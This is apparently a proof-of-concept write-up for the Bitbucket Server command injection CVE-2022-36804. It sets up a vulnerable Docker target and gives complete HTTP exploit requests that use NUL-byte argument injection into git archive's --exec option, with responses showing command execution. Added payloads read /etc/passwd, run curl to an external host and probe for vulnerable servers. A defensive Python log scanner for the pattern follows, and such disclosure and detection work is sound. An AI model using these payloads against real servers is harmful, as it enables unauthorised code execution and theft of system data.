
Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)

License: MIT


In affected versions of Atlassian Bitbucket Server and Data Center, a command injection vulnerability exists in multiple API endpoints: an attacker with access to a public repository, or with read permission on a private repository, can execute arbitrary code by sending a malicious HTTP request.

Vulnerable Target Setup

docker pull atlassian/bitbucket-server:7.2.5-ubuntu-jdk11

docker run -v /data/bitbucket:/var/atlassian/application-data/bitbucket --name="bitbucket" -d -p 7990:7990 -p 7999:7999 atlassian/bitbucket-server:7.2.5-ubuntu-jdk11
  • Create a new project named CFX and a repository named lord, and make it public. Any name can be used for the project and repository.
  • URL to list public repositories: curl http://127.0.0.1:7990/rest/api/latest/repos

POC

REQUEST

GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60id%60%00--prefix=/ HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2

RESPONSE

HTTP/1.1 500 
X-AREQUESTID: @1J1EWV1x490x54736x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: accept-encoding,x-auserid,cookie,x-ausername,accept-encoding
Content-Type: application/json;charset=UTF-8
Date: Tue, 04 Oct 2022 08:10:56 GMT
Connection: close
Content-Length: 380

{"errors":[{"context":null,"message":"'/usr/bin/git archive --format=zip --prefix=fusion/\u0000--remote=/\u0000--exec=`id`\u0000--prefix=/ -- 49f16ce1e8ad32a360c9db7a3a84a0b72a12c51f bighax' exited with code 128 saying: `id` '/': 1: uid=2003(bitbucket): not found\nfatal: the remote end hung up unexpectedly","exceptionName":"com.atlassian.bitbucket.scm.CommandFailedException"}]}

Additional Payloads

  • Reading /etc/passwd
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=fusion/%00--remote=/%00--exec=%60cat%20/etc/passwd%60%00--prefix=/
  • OOB test: replace http://example.com with a Burp Collaborator URL or a netcat listener
rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax&prefix=qualys/%00--remote=/%00--exec=curl%20http://example.com%00--prefix=/

Basic check to find a vulnerable server

The NUL byte in the prefix parameter lets --help reach git archive as its own argument, so a vulnerable server answers with HTTP 200 and the git archive usage text instead of a zip archive.

REQUEST

GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&prefix=/%00--help%00--%00 HTTP/1.1
Host: 127.0.0.1:7990
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Length: 2

RESPONSE

HTTP/1.1 200 
X-AREQUESTID: @1J1EWV1x506x54738x0
X-ASEN: SEN-L18735288
Cache-Control: no-cache, no-transform
Vary: X-AUSERNAME
Vary: X-AUSERID
Vary: Cookie
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="lord-master@49f16ce1e8a.zip"; filename*=UTF-8''lord-master%4049f16ce1e8a.zip
Content-Type: application/octet-stream
Content-Length: 875
Date: Tue, 04 Oct 2022 08:26:21 GMT

usage: git archive [<options>] <tree-ish> [<path>...]
   or: git archive --list
   or: git archive --remote <repo> [--exec <cmd>] [<options>] <tree-ish> [<path>...]
   or: git archive --remote <repo> [--exec <cmd>] --list

    --format <fmt>        archive format
    --prefix <prefix>     prepend prefix to each pathname in the archive
    -o, --output <file>   write the archive to this file
    --worktree-attributes
                          read .gitattributes in working directory
    -v, --verbose         report archived files on stderr
    -0                    store only
    -1                    compress faster
    -9                    compress better

    -l, --list            list supported archive formats

    --remote <repo>       retrieve the archive from remote repository <repo>
    --exec <command>      path to the remote git-upload-archive command
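As a defensive addition that is not part of the original PoC, the following script checks web-server request lines for archive requests whose query parameters carry NUL-separated git options, which covers both the command-execution payloads and the --help probe shown above. The sample request lines are constructed for this example; real logs may store the query string encoded or already decoded, and parse_qs handles both.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request lines in access-log form (not taken from a real server).
SAMPLE_REQUEST_LINES = [
    "GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&path=bighax"
    "&prefix=fusion/%00--remote=/%00--exec=%60id%60%00--prefix=/ HTTP/1.1",
    "GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&prefix=/%00--help%00--%00 HTTP/1.1",
    "GET /rest/api/latest/projects/cfx/repos/lord/archive?format=zip&prefix=release-1.0/ HTTP/1.1",
    "GET /rest/api/latest/repos HTTP/1.1",
]

# The archive endpoint abused in the PoC (any API version segment)
ARCHIVE_PATH = re.compile(r"^/rest/api/[^/]+/projects/[^/]+/repos/[^/]+/archive$")


def find_injected_options(query):
    """Return git option names smuggled into any query parameter after a NUL byte.

    parse_qs decodes %00 to a real NUL. Each NUL-separated fragment becomes a
    separate argv entry for git, so a fragment starting with '-' is an injected
    option; only its name (before any '=') is returned.
    """
    found = []
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            for fragment in value.split("\x00")[1:]:
                if fragment.startswith("-"):
                    found.append(fragment.split("=", 1)[0])
    return found


def scan_request_line(line):
    """Return (path, injected options) for a suspicious archive request, else None."""
    parts = line.split(" ")
    if len(parts) < 2:
        return None
    url = urlsplit(parts[1])
    if not ARCHIVE_PATH.match(url.path):
        return None
    options = find_injected_options(url.query)
    return (url.path, options) if options else None


def scan_log(lines):
    """Collect hits over a sequence of request lines."""
    return [hit for hit in map(scan_request_line, lines) if hit]


if __name__ == "__main__":
    for path, options in scan_log(SAMPLE_REQUEST_LINES):
        print(f"suspicious archive request on {path}: {' '.join(options)}")
```

A legitimate prefix such as release-1.0/ contains no NUL and is not flagged, so the check keys on the injection mechanism rather than on specific payloads.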